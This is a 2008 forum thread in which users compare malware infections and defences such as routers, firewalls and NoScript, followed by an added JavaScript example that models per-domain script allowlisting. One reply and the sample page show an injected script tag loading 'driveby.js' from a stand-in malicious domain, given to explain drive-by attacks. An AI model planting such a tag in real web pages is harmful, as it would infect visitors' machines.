Author Topic: Virus/Worm attacks - are they getting worse?  (Read 10602 times)

Carol Haynes

Virus/Worm attacks - are they getting worse?
« on: October 02, 2008, 04:49 PM »
Is it just me or are virus and worm attacks getting worse?

I have gone for years without getting any malware on my system and in the space of a week I have had two unrelated incidents!

The first (which I mentioned in a different thread) swapped my DNS server so that all my internet traffic was routed through a server in the Ukraine!

Today another nasty managed to install AutoRun.inf files on every drive and resycled\boot.com (as a hidden system file/folder).

I don't know what the payload was but NOD32 managed to delete the files as fast as they replicated (but didn't clean my system of the problem).

No harm done and I now have a clean system again - but these must have been acquired as drivebys on websites.

I didn't visit porn or warez sites, I don't play games and the sites I visit are almost always mainstream websites - so what is going on?

Am I paranoid or is someone really out to get me?

cranioscopical

Re: Virus/Worm attacks - are they getting worse?
« Reply #1 on: October 02, 2008, 06:05 PM »
Am I paranoid or is someone really out to get me?
-Carol

Definitely!  :)

Sorry to see you've been bugged by this kind of thing!


wreckedcarzz

Re: Virus/Worm attacks - are they getting worse?
« Reply #2 on: October 02, 2008, 06:06 PM »
Am I paranoid or is someone really out to get me?
-Carol

Definitely!  :)

Sorry to see you've been bugged by this kind of thing!


-cranioscopical (October 02, 2008, 06:05 PM)

 ;D ;D ;D

Carol Haynes

Re: Virus/Worm attacks - are they getting worse?
« Reply #3 on: October 02, 2008, 06:26 PM »
 :-[

f0dder

Re: Virus/Worm attacks - are they getting worse?
« Reply #4 on: October 02, 2008, 06:31 PM »
Are you behind a NATing router? (without DMZ and with sensible forwarding rules!)
Do you have XP's firewall enabled?
Do you use firefox+adblockplus+noscript?

If you answer yes to all the above, you shouldn't get malware... unless something's really really wrong.
- carpe noctem

wreckedcarzz

Re: Virus/Worm attacks - are they getting worse?
« Reply #5 on: October 02, 2008, 06:35 PM »
I personally have all the above, except I use DMZ for gaming (server host) needs, and my computer hasn't seen a bit of malicious software yet (almost 18 months old).

Make sure other users on the computer (if any) are locked down... I left my sister and her friend on my laptop alone (her user account, admin) for a couple hours a week ago, and had to reinstall Firefox, CS:S, and a couple other things afterward. Strangely, only some files were missing, and they weren't uninstalled.

Grorgy

Re: Virus/Worm attacks - are they getting worse?
« Reply #6 on: October 02, 2008, 06:41 PM »
I find no script to be perhaps the single most annoying piece of software ever to be on my computer, I was forever trying to configure the thing to let me see sites I wanted to see, I gave up, life's too short.

wreckedcarzz

Re: Virus/Worm attacks - are they getting worse?
« Reply #7 on: October 02, 2008, 06:45 PM »
NoScript isn't bad, nor hard to configure - I just go around browsing and when a site whines about having Javascript or Flash or something off or not installed, I just tick it on and away it goes (with a refresh, of course).

That's just my method, but you can't get much easier than that. A month of browsing and all your normal sites will be set up.

Ehtyar

Re: Virus/Worm attacks - are they getting worse?
« Reply #8 on: October 02, 2008, 07:00 PM »
Are you behind a NATing router? (without DMZ and with sensible forwarding rules!)
Do you have XP's firewall enabled?
Do you use firefox+adblockplus+noscript?

If you answer yes to all the above, you shouldn't get malware... unless something's really really wrong.
-f0dder

I held my tongue, but I would have asked the same questions.

Ehtyar.

Carol Haynes

Re: Virus/Worm attacks - are they getting worse?
« Reply #9 on: October 02, 2008, 07:17 PM »
Are you behind a NATing router? (without DMZ and with sensible forwarding rules!)
Do you have XP's firewall enabled?
Do you use firefox+adblockplus+noscript?

If you answer yes to all the above, you shouldn't get malware... unless something's really really wrong.
-f0dder

Yes - except for the noscript (installing it as I type this - can't think how I missed it) and I use AdMuncher rather than AdBlockPlus.

The only port forwarding rule I have added manually in my router is for uTorrent (and I only really use that for downloading video files).


f0dder

Re: Virus/Worm attacks - are they getting worse?
« Reply #10 on: October 02, 2008, 07:20 PM »
I find no script to be perhaps the single most annoying piece of software ever to be on my computer, I was forever trying to configure the thing to let me see sites I wanted to see, I gave up, life's too short.
-Grorgy

Annoying? Indeed. And if you're impatient, you might end up whitelisting everything, removing the benefit of NoScript. Also, you could end up on a legitimate and whitelisted site... which has been hacked. But imho the added security is worth the hassle.

EDIT: personally I prefer ABP to AM - dunno why exactly, but I prefer not dealing with winsock hooking and only having my web browser filtered. Dunno which one is most likely to have "slips", but I haven't been hit with malware for several years. I guess running x64 also helps reduce some attack vectors - the browser + flash is still 32bit, and that probably is the main attack vector.
- carpe noctem
« Last Edit: October 02, 2008, 07:22 PM by f0dder »

Carol Haynes

Re: Virus/Worm attacks - are they getting worse?
« Reply #11 on: October 02, 2008, 07:35 PM »
OK I am playing with noscripts and I can see how it works.

I am fine with going to amazon.co.uk and allowing [email protected] etc. but how do you decide which scripts are useful and which aren't?

For example google-analytics? I guess if you block that then google robots won't pick up page visits/changes etc. and won't harm the browsing experience.

However, for a lot of the shopping sites I use I go through www.nectar.com so that I can collect Nectar points on purchases - their site has a lot of scripts but it is hard to tell which ones are involved in generating the communication with the shop site to ensure points are delivered. I am tempted just to let nectar.com do its thing (and all its scripts) but some of the scripts are for things like doubleclick (which I presume is a tracking/marketing tool because it seems to be endemic on a lot of legitimate trading sites).

What strategies do people use to decide what to allow and what to block?

Ehtyar

Re: Virus/Worm attacks - are they getting worse?
« Reply #12 on: October 02, 2008, 09:17 PM »
Firstly, you would naturally avoid those sites where you can. Where you can't, you start enabling subdomains of the primary domain until the content renders correctly, then carry on to those domains that appear to be legitimate. If that approach doesn't work, you can temporarily allow the entire page, though that really defeats the point of NoScript. NoScript can be a lot of work, but it's a lot of work for a good reason.

Ehtyar.

Carol Haynes

Re: Virus/Worm attacks - are they getting worse?
« Reply #13 on: October 03, 2008, 05:06 AM »
Thanks Ehtyar - I am really curious what strategies people use.

It strikes me that if I am shopping on Amazon I implicitly trust the site so I may as well allow Amazon to display the content it wants, the way it wants.

Having said that if all of these security apps become too onerous you either end up enabling everything (and this goes for HIPS and firewalls too) or you uninstall it and use something simpler. It's one of the reasons I gave up on firewalls that allegedly provide outbound security - you constantly have to answer questions and at the end of the day if you say no the software doesn't work properly (so you shouldn't install it in the first place) and if you say yes you are implicitly trusting the publisher not to do anything nasty so you may as well give it full control over its environment.

I know a lot of people round here use security apps to try and filter incoming and outgoing web traffic but it would be good if people chipped in and said how they discriminate between different kinds of apps/sites etc.

Ehtyar

Re: Virus/Worm attacks - are they getting worse?
« Reply #14 on: October 03, 2008, 06:49 AM »
Most often you're perfectly safe trusting javascript originating from a site you actually do trust (amazon.com for example). The trouble originates in things like SQL injection, whereby a script tag is inserted into the document which requests your browser load javascript from a different domain e.g.
<script src="http://www.maliciousdomain.com/driveby.js"></script>
Thus, amazon.com scripts would run, as they're trusted, while the injected script would be blocked, as the code does not originate from amazon.com.

Ehtyar.
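
The per-domain decision described in Reply #14, as an added example that is not part of the original thread and is not NoScript's own code: a simplified model that lists each script in a page and decides allow or block from an allowlist. The allowlist contents, the subdomain-matching rule, the sample page and the function names are assumptions made for illustration; the last sample line shows the case raised in Reply #10, where a script placed inline on an allowlisted page is judged by that page's own host.

```javascript
// Simplified model of per-domain script allowlisting (added example, not NoScript's code).
// Assumption: an allowlist entry such as "amazon.com" also covers its subdomains.
const allowlist = ["amazon.com"];

function hostAllowed(host, list) {
  const h = host.toLowerCase().replace(/\.$/, "");
  // Match the exact domain or a true subdomain; a bare suffix or substring test
  // would wrongly accept lookalikes such as "amazon.com.example".
  return list.some((d) => h === d || h.endsWith("." + d));
}

// Classify every <script> start tag in a page. Inline scripts have no src and
// execute as part of the page itself, so they are judged by the page's host.
// A regex is enough for this constructed sample; real pages need an HTML parser.
function classifyScripts(pageUrl, html, list) {
  const pageHost = new URL(pageUrl).hostname;
  const results = [];
  const tagRe = /<script\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = /(?:^|\s)src\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    // Relative and protocol-relative URLs resolve against the page URL.
    const host = src ? new URL(src[1], pageUrl).hostname : pageHost;
    results.push({ kind: src ? "external" : "inline", host, allowed: hostAllowed(host, list) });
  }
  return results;
}

// Constructed sample page (paths and the "static" subdomain are made up).
const samplePage = `
<html><body>
<script src="/js/site.js"></script>
<script src="//static.amazon.com/lib.js"></script>
<script src="http://www.maliciousdomain.com/driveby.js"></script>
<script src="http://amazon.com.maliciousdomain.com/x.js"></script>
<script>/* inline script placed in the page itself */</script>
</body></html>`;

const report = classifyScripts("http://www.amazon.com/item", samplePage, allowlist);
for (const r of report) {
  console.log(r.kind.padEnd(8), r.host.padEnd(32), r.allowed ? "ALLOW" : "BLOCK");
}
```
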